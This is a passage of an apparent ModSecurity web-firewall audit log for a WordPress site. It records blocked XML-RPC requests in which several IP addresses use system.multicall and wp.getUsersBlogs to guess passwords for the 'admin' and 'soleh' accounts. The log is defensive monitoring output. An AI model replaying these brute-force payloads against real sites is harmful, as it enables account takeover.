bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.253 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c96c7b0c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin159 --c96c7b0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c96c7b0c-E-- --c96c7b0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.253 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101236781269 6248 (- - -) Stopwatch2: 1749101236781269 6248; combined=4425, p1=514, p2=3743, p3=0, p4=0, p5=101, sr=93, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c96c7b0c-Z-- --8cb3271f-A-- [05/Jun/2025:12:27:29 +0700] aEEqweth7G2xELALzPYhnQAAAMg 103.236.140.4 35948 103.236.140.4 8181 --8cb3271f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.48.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8cb3271f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh2012 --8cb3271f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cb3271f-E-- --8cb3271f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.48.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101249754928 5354 (- - -) Stopwatch2: 1749101249754928 5354; combined=3948, p1=488, p2=3286, p3=0, p4=0, p5=102, sr=118, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cb3271f-Z-- --ed4c4d56-A-- [05/Jun/2025:12:27:47 +0700] aEEq0-th7G2xELALzPYhoAAAAMw 103.236.140.4 35954 103.236.140.4 8181 --ed4c4d56-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ed4c4d56-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminF*uckYou --ed4c4d56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed4c4d56-E-- --ed4c4d56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101267065449 3703 (- - -) Stopwatch2: 1749101267065449 3703; combined=2571, p1=332, p2=2128, p3=0, p4=0, p5=65, sr=60, sw=46, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed4c4d56-Z-- --c7b5a41e-A-- [05/Jun/2025:12:29:35 +0700] aEErP-th7G2xELALzPYhqAAAANQ 103.236.140.4 35974 103.236.140.4 8181 --c7b5a41e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c7b5a41e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin987654321 --c7b5a41e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7b5a41e-E-- --c7b5a41e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101375337203 3926 (- - -) Stopwatch2: 1749101375337203 3926; combined=3097, p1=345, p2=2609, p3=0, p4=0, p5=83, sr=71, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7b5a41e-Z-- --628c2761-A-- [05/Jun/2025:12:33:58 +0700] aEEsRuth7G2xELALzPYhwwAAAMI 103.236.140.4 36070 103.236.140.4 8181 --628c2761-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.48.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.48.162 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --628c2761-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh@admin --628c2761-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --628c2761-E-- --628c2761-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.205.48.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101638297764 4770 (- - -) Stopwatch2: 1749101638297764 4770; combined=3593, p1=394, p2=3033, p3=0, p4=0, p5=96, sr=81, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --628c2761-Z-- --cc812661-A-- [05/Jun/2025:12:34:00 +0700] aEEsSOth7G2xELALzPYhxAAAAMM 103.236.140.4 36072 103.236.140.4 8181 --cc812661-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.253 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.253 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --cc812661-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminpass@123 --cc812661-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc812661-E-- --cc812661-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.253 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101640100216 5941 (- - -) Stopwatch2: 1749101640100216 5941; combined=4250, p1=503, p2=3570, p3=0, p4=0, p5=105, sr=99, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc812661-Z-- --5caa733b-A-- [05/Jun/2025:12:34:08 +0700] aEEsUOth7G2xELALzPYhxgAAAMU 103.236.140.4 36078 103.236.140.4 8181 --5caa733b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.82.25.111 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.82.25.111 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5caa733b-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh@admin --5caa733b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5caa733b-E-- --5caa733b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.82.25.111 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101648018520 5573 (- - -) Stopwatch2: 1749101648018520 5573; combined=4068, p1=443, p2=3393, p3=0, p4=0, p5=139, sr=82, sw=93, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5caa733b-Z-- --dc44577e-A-- [05/Jun/2025:12:34:35 +0700] aEEsayrHpfaS2Cuwh8XUNwAAAEY 103.236.140.4 36090 103.236.140.4 8181 --dc44577e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --dc44577e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix123! --dc44577e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc44577e-E-- --dc44577e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101675918777 4616 (- - -) Stopwatch2: 1749101675918777 4616; combined=3540, p1=387, p2=2986, p3=0, p4=0, p5=97, sr=81, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc44577e-Z-- --e9e05739-A-- [05/Jun/2025:12:35:36 +0700] aEEsqH-K7ToMdu-YSIIkagAAAAk 103.236.140.4 36110 103.236.140.4 8181 --e9e05739-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e9e05739-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh@admin --e9e05739-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9e05739-E-- --e9e05739-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101736096463 5610 (- - -) Stopwatch2: 1749101736096463 5610; combined=4057, p1=450, p2=3416, p3=0, p4=0, p5=113, sr=89, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9e05739-Z-- --77f1fe37-A-- [05/Jun/2025:12:35:40 +0700] aEEsrOth7G2xELALzPYh1QAAANU 103.236.140.4 36112 103.236.140.4 8181 --77f1fe37-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 91.134.248.253 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 91.134.248.253 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --77f1fe37-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh# --77f1fe37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77f1fe37-E-- --77f1fe37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 91.134.248.253 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101740993558 4471 (- - -) Stopwatch2: 1749101740993558 4471; combined=3465, p1=379, p2=2920, p3=0, p4=0, p5=97, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77f1fe37-Z-- --f362213f-A-- [05/Jun/2025:12:35:45 +0700] aEEsseth7G2xELALzPYh2AAAANg 103.236.140.4 36118 103.236.140.4 8181 --f362213f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.95.2.150 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.95.2.150 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f362213f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin# --f362213f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f362213f-E-- --f362213f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.95.2.150 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101745281859 4429 (- - -) Stopwatch2: 1749101745281859 4429; combined=3498, p1=392, p2=2942, p3=0, p4=0, p5=96, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f362213f-Z-- --e23dce2c-A-- [05/Jun/2025:12:37:44 +0700] aEEtKOth7G2xELALzPYh7AAAANU 103.236.140.4 36176 103.236.140.4 8181 --e23dce2c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.82.25.111 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.82.25.111 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e23dce2c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin1234$ --e23dce2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e23dce2c-E-- --e23dce2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.82.25.111 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101864199110 5028 (- - -) Stopwatch2: 1749101864199110 5028; combined=3746, p1=457, p2=3122, p3=0, p4=0, p5=98, sr=86, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e23dce2c-Z-- --272ee562-A-- [05/Jun/2025:12:38:03 +0700] aEEtO-th7G2xELALzPYh8AAAAME 103.236.140.4 36188 103.236.140.4 8181 --272ee562-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --272ee562-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh1995 --272ee562-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --272ee562-E-- --272ee562-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101883467103 4444 (- - -) Stopwatch2: 1749101883467103 4444; combined=3509, p1=388, p2=2934, p3=0, p4=0, p5=107, sr=79, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --272ee562-Z-- --f87dad2d-A-- [05/Jun/2025:12:38:58 +0700] aEEtcuth7G2xELALzPYh-wAAAM0 103.236.140.4 36220 103.236.140.4 8181 --f87dad2d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.95.2.150 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.95.2.150 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f87dad2d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh55 --f87dad2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f87dad2d-E-- --f87dad2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.95.2.150 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749101938749104 5503 (- - -) Stopwatch2: 1749101938749104 5503; combined=3949, p1=503, p2=3176, p3=0, p4=0, p5=149, sr=88, sw=121, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f87dad2d-Z-- --a3442649-A-- [05/Jun/2025:12:40:06 +0700] aEEttuth7G2xELALzPYh_wAAANM 103.236.140.4 36240 103.236.140.4 8181 --a3442649-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.37.121.239 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.37.121.239 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a3442649-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin125 --a3442649-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3442649-E-- --a3442649-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.37.121.239 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102006877620 5689 (- - -) Stopwatch2: 1749102006877620 5689; combined=4012, p1=495, p2=3350, p3=0, p4=0, p5=99, sr=87, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3442649-Z-- --11cd1f5f-A-- [05/Jun/2025:12:40:30 +0700] aEEtzlwdJdhOudw5hdzPMwAAAJA 103.236.140.4 36256 103.236.140.4 8181 --11cd1f5f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 69.49.228.101 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 69.49.228.101 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --11cd1f5f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh56 --11cd1f5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11cd1f5f-E-- --11cd1f5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 69.49.228.101 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749102030579041 4239 (- - -) Stopwatch2: 1749102030579041 4239; combined=2856, p1=400, p2=2344, p3=0, p4=0, p5=67, sr=81, sw=45, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11cd1f5f-Z-- --db23a05b-A-- [05/Jun/2025:12:41:47 +0700] aEEuG-th7G2xELALzPYiBwAAAMM 103.236.140.4 36268 103.236.140.4 8181 --db23a05b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.82.25.111 X-Forwarded-Host: bogl.no 